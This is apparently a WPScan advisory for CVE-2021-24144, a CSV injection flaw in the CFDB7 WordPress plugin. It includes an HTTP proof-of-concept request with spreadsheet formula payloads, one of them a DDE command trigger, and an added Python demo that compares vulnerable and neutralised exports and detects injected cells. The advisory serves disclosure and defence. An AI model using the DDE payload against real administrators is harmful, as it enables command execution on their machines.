WPScan

WordPress Plugin Vulnerabilities

Contact Form 7 Database Addon < 1.2.5.6 - CSV Injection

Description

Contact Form 7 Database Addon (CFDB7) stores Contact Form 7 submissions in the WordPress database and lets administrators export them as a CSV file. Before version 1.2.5.6 the plugin did not neutralise submitted field values before writing them to that export, so anyone able to submit a form could place cells beginning with spreadsheet formula characters (for example =, +, -, @) into a file that an administrator later opens in Excel or another spreadsheet application. Depending on the application and its security prompts, such cells can be used to run commands on the administrator's machine through Excel's DDE functionality or to exfiltrate data through injected hyperlinks. Version 1.2.5.4 is confirmed vulnerable; earlier versions are likely affected as well.

Proof of Concept

POST /wp-json/contact-form-7/v1/contact-forms/219/feedback HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------127233189811167375871189751352
Content-Length: 1339
Origin: http://example.com
Connection: close

-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7"

219
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7_version"

5.3.2
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7_locale"

en_US
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7_unit_tag"

wpcf7-f219-p1-o1
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7_container_post"

1
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7_posted_data_hash"


-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="your-name"

=SUM(1+2)
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="your-email"

[email protected]
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="your-subject"

=1+1
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="your-message"

;=2+5+cmd|' /C calc'!A1
-----------------------------127233189811167375871189751352--
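The request above only plants the payloads; the damage happens later, when the stored values are exported and opened in a spreadsheet. The following is an added example, not code from CFDB7 or from the original advisory, that reproduces the vulnerable export behaviour beside a hardened one and includes a check for submissions that are already in the database. The sample rows are constructed here from the PoC field values; the field names and the export format are assumptions and do not mirror the plugin's own code. It goes slightly beyond the leading-character rule by also catching a formula trigger that sits right after a field separator, which is what the ;=2+5+cmd... payload in the PoC relies on when the consumer splits cells on ";".

```python
"""CSV-injection demo: vulnerable export vs. neutralised export (added example)."""
import csv
import io
import re

# Leading characters that spreadsheets interpret as the start of a formula.
# Tab and carriage return are included because Excel trims them and then
# evaluates what follows.
FORMULA_TRIGGERS = "=+-@\t\r"

# A trigger is dangerous at the start of a cell, and also right after a field
# separator: if the importing spreadsheet splits on ';' instead of ',' the
# text after ';' becomes its own cell (the PoC message above leads with ';').
_TRIGGER_AT_BOUNDARY = re.compile(r"(^|[,;\t])(?=[=+\-@\t\r])")

# Assumed field names, taken from the PoC request above (not CFDB7's schema).
FIELDS = ["your-name", "your-email", "your-subject", "your-message"]

# Constructed sample rows: the first mirrors the PoC payloads, the second is a
# benign submission that must pass through unchanged.
SAMPLE_SUBMISSIONS = [
    {"your-name": "=SUM(1+2)", "your-email": "attacker@example.com",
     "your-subject": "=1+1", "your-message": ";=2+5+cmd|' /C calc'!A1"},
    {"your-name": "Alice", "your-email": "alice@example.com",
     "your-subject": "Hello", "your-message": "plain text, no formula"},
]


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet would evaluate the cell, or a delimiter-split
    part of it, as a formula."""
    return _TRIGGER_AT_BOUNDARY.search(value) is not None


def neutralise_cell(value: str) -> str:
    """Make a cell render as text by inserting an apostrophe before every
    formula trigger at a cell or delimiter boundary (the OWASP-recommended
    prefix, applied at each boundary rather than only at position 0).
    Trade-off: a legitimate negative number such as '-1' becomes "'-1";
    handle numeric columns separately if that matters."""
    return _TRIGGER_AT_BOUNDARY.sub(r"\1'", value)


def export_csv(rows, fieldnames, hardened=True) -> str:
    """Serialise submissions the way a form-to-CSV export does.
    hardened=False writes cells raw (the vulnerable behaviour);
    hardened=True neutralises every cell and quotes every field."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        cells = {k: str(row.get(k, "")) for k in fieldnames}
        if hardened:
            cells = {k: neutralise_cell(v) for k, v in cells.items()}
        writer.writerow(cells)
    return buf.getvalue()


def read_back(text: str):
    """Parse an export back into rows, as a spreadsheet import would."""
    return list(csv.reader(io.StringIO(text)))


def find_injected_cells(rows, fieldnames):
    """Return (row index, field) pairs whose stored value looks like a
    formula, for auditing submissions captured before the fix was applied."""
    return [(i, k) for i, row in enumerate(rows) for k in fieldnames
            if is_formula_like(str(row.get(k, "")))]


if __name__ == "__main__":
    print("suspicious cells:", find_injected_cells(SAMPLE_SUBMISSIONS, FIELDS))
    print("--- vulnerable export ---")
    print(export_csv(SAMPLE_SUBMISSIONS, FIELDS, hardened=False))
    print("--- hardened export ---")
    print(export_csv(SAMPLE_SUBMISSIONS, FIELDS, hardened=True))
```

Neutralising at export time is the fix that matches this advisory; running find_injected_cells over rows that were stored before the upgrade is the check an incident responder would want, because upgrading the plugin does not clean values already sitting in the database.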
 

Affects Plugins

contact-form-cfdb7
Fixed in version 1.2.5.6

References

CVE
CVE-2021-24144
URL
https://plugins.trac.wordpress.org/changeset/2460800

Classification

Type

CSV INJECTION

OWASP top 10
A1: Injection
CWE
CWE-1236 (Improper Neutralization of Formula Elements in a CSV File)

Miscellaneous

Original Researcher

SunCSR-thiennv

Submitter

thiennv

Verified

Yes

WPVDB ID
143cdaff-c536-4ff9-8d64-c617511ddd48

Timeline

Publicly Published

2021-01-25

Added

2021-01-25

Last Updated

2021-01-29
